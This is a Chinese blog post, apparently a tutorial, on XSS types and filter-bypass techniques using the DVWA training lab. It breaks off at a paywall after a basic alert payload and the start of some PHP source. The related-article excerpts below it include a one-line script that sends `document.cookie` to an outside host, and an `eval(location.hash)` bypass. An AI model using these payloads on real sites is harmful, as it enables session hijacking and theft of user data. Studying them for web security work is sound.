XSS(跨站脚本攻击)多姿势绕过滤思路

最新推荐文章于 2024-05-22 10:49:06 发布
最新推荐文章于 2024-05-22 10:49:06 发布
阅读量1.2k 收藏 4
点赞数 5
分类专栏: web安全 文章标签: js javascript web xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ElsonHY/article/details/109753184
版权

XSS(跨站脚本攻击)多姿势绕过滤思路

0x01 什么是XSS?

恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击主要针对的是客户端的攻击。

0x02 XSS的危害

XSS能实现的的攻击有很多,一般攻击水平是取决于攻击者的js水平。

  • 针对用户:窃取cookie劫持会话、网络钓鱼、放马挖矿、广告刷流量等。

  • 针对WEB服务:劫持后台、篡改页面、传播蠕虫、内网扫描等。

0x03 XSS类型

  1. 反射型

    又被称为非持久型XSS,将JS恶意代码暂时保存到网页前端,一旦重新请求页面,恶意代码会被消除,一般用于XSS注入点的盲测或者钓鱼。

  2. 存储型

    存储型XSS,又称持久型XSS,它和反射型XSS最大的不同就是,攻击脚本将被永久地存放在目标服务器的数据库或文件中。允许用户存储数据的WEB应用程序都可能出现存储型漏洞,当攻击者提交一段XSS代码后,被服务器接受被储存,当访问者再次访问此网站,这段代码又被提取出来,响应给浏览器。形成储存型XSS漏洞攻击。

  3. DOM型

    全称Document Object Model,在网站页面中有许多页面的元素,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。简单来说DOM是通过url传入参数来触发XSS的,也可以认为是反射型的一种。

0x04 多姿势绕过

1.基本的xss

以DVWA(Reflected)的low等级举例(完全没有过滤的情况下)。

<script>alert(`Rdrug`);</script>

在这里插入图片描述

2.大小写绕过、字符拼接

以DVWA(Reflected)的middle等级举例。

源码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name"
最低0.47元/天 解锁文章
RDrug
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跨站脚本攻击字符过滤
07-25
用这个办法,可以过滤在输入中含有 % [ ] { } ; & + - " ( ) 的这些字符。
跨站测试与利用中的过技术
cnbird's blog
10-08 1949
1.1 bypass Char 通常有安全意识的程序员往往会对输入进行一定的过滤,比较常见的是针对某一关键符号进行过滤,比如“”,这种方式很多时候是无法防止攻击的,更安全的方式是通过编程语言提供的函数在输出的时候进行过滤。 本节主要针对单字符过滤进行研究,分为引号、尖括号、括号这三个符号进行研究。 1.1.1 引号 在跨站测试中很多的vector(即攻击向量)本身是不包含引号的,例如下
什么是XSS攻击?XSS跨站脚本攻击及防护(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-22 2940
XSS(Cross-Site Scripting,跨站脚本攻击)是一种代码注入攻击。攻击者在目标网站上注入恶意代码,当用户(被攻击者)登录网站时就会执行这些恶意代码,通过这些脚本可以读取cookie,session tokens,或者网站其他敏感的网站信息,对用户进行钓鱼欺诈。XSS玫击原理XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript 编写的恶意代码,也有使用其他客户端脚本语言编写的。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。
Xss多种姿势
浅浅徘徊的博客
03-19 707
xss攻击 字符编码 firefox下某参数为%c1\"alert(/xss/) var username="";alert(/xss/) 过长度限制 location.hash http://www.test.com#alert() onclick='eval(location.hash.substr(1)) 注释 多个input把中间注释&gt;&lt;!-...
Web安全——跨站脚本攻击XSS
Newscoo的博客
08-02 718
跨站脚本攻击XSS)什么是XSS?一、XSS的分类1、反射型XSS2、存储型XSS3、DOM Based XSS二、跨站脚本的挖掘方法1、跨站脚本的核心挖掘思想2、跨站脚本的测试思路3、XSS探针4、跨站脚本的测试语句三、跨站脚本的攻击技巧1、窃取Cookie2、篡改网页3、网络钓鱼4、网络挂马5、BEEF四、防御跨站脚本攻击的技巧1、HttpOnly2、输入检查(1)输入过滤(2)输入验证3、输出检查4、内容安全策略(CSP)总结网安小白又又又来瞎咧咧了!!!如有不足,请多指教!!! 什么是XSS? 跨
xss跨站点脚本编制漏洞/antisamy策略过滤
09-07
XSS跨站点脚本注入攻击过滤器,包括antisamy官方提供的各种策略xml文件。 antisamy-slashdot.xml 策略 antisamy-ebay.xml 策略 antisamy-myspace.xml 策略 antisamy-anythinggoes.xml 策略
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,...这只是xss跨站脚本攻击的一些基本知识点和实践案例,更多的信息和技术细节需要进一步学习和研究。
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站脚本攻击
01-27
跨站脚本攻击XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
防止XSS跨站脚本攻击:Java过滤
热门推荐
琦彦
01-25 2万+
XSS问题描述 跨站脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。 我们常常听到“注入”(Injection),如SQL注入,那么到底“注入”是什么?注入本质上就是把输入的数据变成可执行的程序语句。SQL注入是如此,XSS也如此,只不过XSS一般注入的是恶意的脚本代码,这些脚本代码可以用来获取合法用户的数...
Xss字符编码突破过滤方法总结
02-11
详细介绍了主流的9种Xss字符编码突破过滤方法,纯手工,欢迎交流学习。
java过滤跨站脚本攻击_SpringBoot过滤XSS脚本攻击
weixin_33900916的博客
02-24 311
前排提醒源码在最后XSS攻击是什么XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web客户将代码植入到提供给其它客户使用的页面中。简而言之,就是作恶客户通过表单提交少量前台代码,假如不做解决的话,这些前台代码将会在展现的时候被浏览器执行。如何避免...
xss(跨站脚本攻击)简单示例
一边敲代码,一边思考人生...
11-21 1702
New Document 在文本框里面输入如下内容 function test() {          var img = new Image();          img.src="http://www.caihuadadao.com?cookie="+encodeURIComponent(document.cookie);
谈谈对于XSS跨站脚本攻击的学习(1)
2302_76827504的博客
04-17 313
最近学完XXE之后,对于这种恶意代码注入的漏洞提起来兴趣,想着现在正好趁热打铁,学习一下XSS,之前做题的时候看大师傅的wp一愣一愣的,不明白个所以然,这次系统的学习一下,在本文中将介绍有关XSS的知识点以及原理,也会介绍XSS姿势(这里参考了别的大师傅的思路,也给出了我自己的理解),希望给正在学习XSS的你有帮助。
XSS弹窗的三个函数
W小哥
12-24 3160
http://127.0.0.1/xss/level1.php?name= http://127.0.0.1/xss/level1.php?name= http://127.0.0.1/xss/level1.php?name=
过滤关键字防止XSS攻击
weixin_30950887的博客
11-30 804
public static string ClearXSS(string str) { string returnValue = str; if (string.IsNullOrEmpty(returnValue)) { return string.Empty; } ///过滤C...
浅谈XSS攻击的那些事(附常用姿势
chen__an的博客
09-02 1097
前言 随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。 什么是XSS攻击 先上一段标准解释(摘自百度百科)。 “XSS跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时
CTFHub XSS 过滤关键词 WriteUp
柠檬i的博客
07-05 805
xss关键词过滤,双写过和大小写过是比较常见的方式
XSS跨站脚本攻击详解与防御策略
"该资源主要介绍了XSS跨站脚本攻击的相关知识,包括攻击的定义、类型、漏洞挖掘以及防范措施。此外,还探讨了Web安全的三个主要目标:保护Web服务器及其数据的安全、保护信息传递的安全以及保护终端用户设备的安全。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值